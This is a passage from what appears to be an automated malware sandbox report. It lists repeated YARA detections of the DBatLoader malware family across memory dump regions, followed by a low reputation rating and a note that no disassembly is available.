                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.384404649.00000000047FB000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.421890595.00000000058A9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.470742737.000000000538A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.526945257.0000000005867000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.401374110.0000000004684000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.405069389.0000000004768000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.413452133.0000000005724000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.449064329.000000000537C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.452539340.0000000005364000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.425810513.0000000005852000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.481942578.000000000543B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.508537851.0000000005935000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.372707185.0000000005470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.356239685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.464356911.00000000054A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.451399152.0000000004983000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.381326351.00000000046DA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.399740861.0000000004781000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.479431451.000000000535E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.474528340.00000000054A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                No disassembly